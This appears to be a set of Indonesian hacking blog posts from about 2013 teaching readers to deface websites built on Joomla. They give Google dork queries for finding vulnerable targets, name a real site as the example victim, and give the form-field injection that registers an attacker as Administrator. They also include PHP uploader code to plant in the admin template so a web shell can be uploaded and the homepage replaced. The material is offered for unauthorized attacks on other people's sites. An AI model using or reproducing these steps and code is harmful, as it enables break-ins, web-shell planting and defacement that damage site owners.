Responsive Banner design

Cara Deface Web dengan Exploit Joomla | Inspect Element

Cara Deface Web dengan Exploit Joomla | Inspect Element - Halo defacer Indonesia, kali ini saya akan memberi tahu anda cara mendeface web yang menggunakan cms joomla dengan Exploit Joomla | Inspect Element.  Dan ternyata, Teknik ini lebih mudah dibanding teknik Exploit Joomla (Com_User). Dan tutorial ini, intinya sama dengan tutorial Com_User.

Gunakan Browser Google Chrome agar lebih mudah.

*Tutorial ini dibuat menggunakan Browser Google Chrome
* Bantu saya untuk mengembangkan blog ini menjadi lebih baik dengan mengklik Google Adsense atau Iklan yang ada di atas posting, dibawah posting, dan atau disebelah kiri atas posting. 1 klik sangat berharga bagi saya dan bernilai $0.01 - $1 per kliknya.
Langkah-Langkah:
1. Cari target secara Random dengan menggunakan Google Dork ini:

atau anda bisa membaca : Google Dork Com_User

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it
(atau)
intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
(atau)
intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

Penjelasan:
*site: boleh diganti dengan ca/ it/ za/ id/ ru dll ( sesuai keinginan anda )

intitle: berarti, kata yang terkandung dalam judul sebuah Web.
intext: berarti, kata yang terkandung didalam web tersebut.
site: berarti, domain yang digunakan oleh web tersebut. ca=Canada ru=Russia dan sebagainya.

*Google Dork kembangkan sendiri agar mendapat hasil yang lebih maksimal.


Gambar 1: Target

2. Setelah mendapatkan target. langkah selanjutnya adalah pergi ke halaman Registrasi Web tersebut dengan menambahkan: index.php?option=com_users&view=registration
Disini target saya adalah www.jimseasytennis.com.au
Jadi saya harus pergi ke: www.jimseasytennis.com.au/index.php?option=com_users&view=registration

Gambar 2: Halaman Registrasi Web
3. Lalu anda akan melihat tampilan halaman registrasi sebuah web CMS Joomla seperti Gambar 2 diatas. 

Gambar 3: Memasukan Nama, Username, Password, Email.


4. Isikan Halaman yang kosong ( Nama, Username, Password, Email )
* Untuk bagian password, isikan Password dan Confirm Password secara berbeda.

Contoh:
Password: anonymous

Confirm Password: hacked


Gambar 4: Inspect Element

5. Klik pada kotak email ke 2 ( Confirm Email Address ) -> Klik Kanan pada mouse -> Inspect Element / Periksa Element

Gambar 5: Edit HTML

6. Setelah menyelesaikan langkah ke 5, maka akan muncul Tapmpilan seperti Gambar 5. Lalu klik kanan pada kode HTML <dd> lalu klik tulisan Edit As Html.

Gambar 6: Edit HTML

Gambar 7: Edit HTML

7. Setelah itu, masukkan kode EXPLOIT ini di bagian paling bawah setelah kode HTML yang ada di Gambar 6. Dan hasilnya seperti pada gambar 7.

<dd><input value="7" name="jform[groups][]" /></ dd>

* Value 7 menunjukan kita berada di Administrator Grup bukan di Super User grup yang ada di Value 8.

8. Klik Register

Gambar 8: Mengisi Kotak Password

9. Setelah ada pemberitahuan Password yang anda masukkan tidak cocok seperti Gambar 8. Langkah selanjutnya adalah Mengisi kembali pada kotak Password dengan password anda.
Contoh:
Password: Hacked
Confirm Password: Hacked

Gambar 9: Registrasi Sukses

10. Setelah registrasi sukses seperti Gambar 9 lalu pergi ke Email anda lalu klik Kode Aktivasi yang diberikan oleh web tersebut.
*Jika alamat aktivasi web tersebut tidak masuk ke inbox, maka anda bisa melihatnya di bagian spam.

Gambar 10: Login sebagai Administrator

11. Setelah mengklik kode validasi, lalu pergi ke halaman administrator web tersebut dengan menambahkan /administrator di belakang alamat web tersebut.

Gambar 11: Sukses

12. Sukses
13. Setelah masuk ke halaman Administrator, langkah terakhir adalah dengan menebas indexnya.

Baca: Cara Tebas Index di Web CMS Joomla 1.7
           Cara Memasang Shell di Web CMS Joomla 1.7

Now, you can contact me on:



Semoga Bermanfaat
copyright © 2013 Scupe.Id

Google Dork Com_User

Apa itu Google Dork menurut Istilah Hacking?

Google Dork adalah salah satu kata kunci, untuk mempermudah pencarian menggunakan situs search engine terkenal seperti Google dan biasanya digunakan untuk mencari data-data yang tersembunyi seperti user, password dan lain lain. Google Dork biasanya dipakai oleh hacker-hacker di seluruh dunia, untuk mencari target atau kelemahan suatu Web.



Mengapa banyak orang yang Mendaface Web Joomla dengan metode ini?

Deface dengan menggunakan metode Com_User sangat sering digunakan. karena, target yang bisa di deface dengan cara ini cukup banyak dan mudah untuk dicari. apalagi anda mempunyai google dork yang berkualitas.

Baca Juga: Cara Deface Web dengan Metode Com_User

Elemen-Elemen yang ada pada Google Dork
1. Inurl:
Inurl berarti kata yang terkandung dalam sebuah URL / alamat sebuah web.
2. Intext:
Intext berarti kata yang terdapat pada Template / Isi / Artikel sebuah website.
3. Intitle:
Intitle berarti kata yang terkandung pada sebuah Judul.
4. Site:
Site berarti domain yang dipakai web tersebut. (Com/Net/Org dll)

Macam-Macam Google Dork yang dipakai untuk mencari target dengan metode Com_User.


Bagi yang mau Google Dork Israel yang ampuh, bisa kunjungi:


intext:Usar un nombre de usuario y contraseña válido para poder tener acceso a la Administración.. Joomla!® es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2011 - Hosting Joomla Spanish Webempresa

intitle:home page beez joomla 1.6 inurl:com/joomla

intitle:home page beez 2 inurl:com/joomla

intitle:home page beez 5 inurl:com/joomla

intitle:home page atomic inurl:com/joomla

intext:Joomla!® - бесплатное программное обеспечение, распространяемое по лицензии GNU General Public License
Локализация: Портал Joomla! по-русски. Техническая поддержка: Форум русской поддержки Joomla! CMS inurl:/administrator

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it

intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

inurl:/administrator/index.php intext:Use a valid username and password to gain access to the administrator backend. Joomla!® is free software released under the GNU General Public License.

intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

inurl:index.php/using-joomla/extensions/components/users-component/registration-form

Google Dork yang berwarna merah, memiliki kualitas tinggi.
Google Dork yang berwarna biru, memiliki kualitas sedang.
Google Dork yang berwarna oranye, memiliki kualitas rendah.

*Untuk hasil yang lebih maksimal, anda harus mengkreasikan google dork.

Jika anda belum mengerti, anda bisa bertanya di grup https://www.facebook.com/groups/indocyberattacker/

Semoga Bermanfaat
copyright © 2013 Scupe.Id

Cara memasang shell di Joomla

Cara memasang shell di Joomla - Bagaimana cara menebas index di web joomla? ada dua cara untuk menebas index di web joomla. yang pertama ke template manager lalu ganti script web tersebut dengan sript deface kamu. yang kedua dengan memasang shell lalu tebas index.php nya. Dan kali ini saya akan menjelaskan cara yang kedua, yaitu cara menanam/memasang shell di web Joomla.

Bahan:
Shell (Download Here)
Shell ( Download Here )

Langkah-Langkah:
1. Login ke halaman Administrator ( site.com/administrator ).
*Tulisan berwarna merah, ganti dengan alamat web joomla yang akan ditanam shell.


2. Klik menu Template Manager yang terdapat di halaman utama.


3. Lihat Template Administrator yang aktif ( Yang aktif terdapat tanda bintang ). lalu klik tombol Templates.


4. Klik pada judul Template Administrator yang aktif tadi.


5. Klik pada tulisan Edit Main Page Templates.


6. Taruh Script ini di bawah Script halaman Administrator. dan save.

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>



7. Setelah Save berhasil, akan muncul fasilitas untuk mengupload shell. ( terdapat di paling bawah halaman administrator ). Lalu pilih file shell kamu.


8. Setelah Shell dipilih. Klik pada tombol Upload.

*jika berhasil, akan ada tulisan Upload Sukses !!!


9. Masuk ke dalam shell kamu ( site.com/administrator/Nama shell kamu.php ) Lalu cari tulisan index.php dan klik pada tombol edit
*Tulisan berwarna merah harus di ganti.


10. Hapus semua script dan tempel script kamu. Lalu klik tombol save.

*Jika sudah berhasil, akan muncul tampilan script deface anda
Jika ingin masuk ke dalam shell kamu lagi. tinggal tulis url site.com/administrator/nama shell kamu.php

Semoga Bermanfaat
copyright © 2013 Scupe.Id

Cara deface web dengan metode Com_User

Cara deface web dengan metode Com_User/Exploit Joomla - Com_User adalah salah satu teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di indonesia dan bahkan di seluruh dunia. Com_User / Teknik Exploit joomla! ini dapat di gunakan untuk CMS Joomla! yang menggunakan joomla! versi 1.6.x. / 1.7.x. / 2.5.x.




Apa sih CMS Joomla itu?

Joomla! adalah Sistem manajemen konten (SMK atau CMS) yang bebas dan terbuka (free opensource) ditulis menggunakan PHP dan basisdata MySQL untuk keperluan di internet maupun intranet. Joomla pertamakali dirilis dengan versi 1.0.0. Fitur-fitur Joomla! diantaranya adalah sistem caching untuk peningkatan performansi, RSS, blogs, poling, dll. Joomla! menggunakan lisensi GPL.
Asal kata Joomla sendiri berasal dari kata Swahili jumla yang mengandung arti "kebersamaan".
(dikutip dari wikipedia.org)

Baca Juga:


Yang anda butuhkan:
1. Exploit Joomla (download disini)

Langkah-Langkah:

1. Cari web target dengan menggunakan mesin pencari dengan "dork" yang ada dibawah ini.
Klik untuk membuka: Google Dork Com_User

2. Setelah mendapatkan suatu web yang menggunakan CMS Joomla!, lalu cobalah membuka halaman administrator untuk memastikan apakah webnya "vuln" atau tidak

3. Cari web yang vuln.
*Penjelasan: Vuln = Vulnerability = Mempunyai kelemahan. Sehingga web yang dikatakan vuln berarti bisa untuk kita Deface.


Gambar diatas merupakan site "Vuln" alias menggunakan CMS Joomla Versi 1.7.X


Gambar diatas merupakan site "Joomla versi 1.6.x / 2.5.x".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomla nya."

*Web yang menggunakan "versi 1.6.x dan 2.5.x" itu bukan berarti sitenya tidak tidak bisa di deface/tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 25% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

4. Setelah menemukan site yang "vuln". masukkan tambahan alamat berikut di belakang alamat/domain/url web sitenya.

index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://targetmu.com/joomla/ maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://targetmu.com/joomla/index.php?option=com_users&view=registration

5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.
*Jika saat anda pergi ke halaman registrasi, dan lalu web itu meredirect anda ke halaman login. Carilah target lain. Karena admin web itu sudah menghapus halaman registrasinya.


6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.


7. Cari kode hidden (dengan bantuan ctrl+f ) dan cari kode hidden seperti gambar di bawah ini. 


8. Copy code yang diberi kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut. 

contoh: http://targetmu.com/joomla/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.

*Jangan lupa mengganti alamat email dan username nya (terserah kamu )
*Password dibiarkan berbeda


10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.


13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.
*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://targetmu.com/joomla/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://targetmu.com/joomla/administrator

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

Baca Juga!

*Ada 4 kemungkinan GAGAL untuk web yang menggunakan CMS Joomla:
1. Web telah menghapus laman Registration Form.
2. Alamat Activation Link tidak masuk kedalam email.
3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.
4. Template tidak bisa di di ubah.
Paling sering GAGAL pada nomor 3

Now, you can contact me on:


Semoga Bermanfaat
copyright © 2013 Scupe.Id




Popular Posts

Powered by Blogger.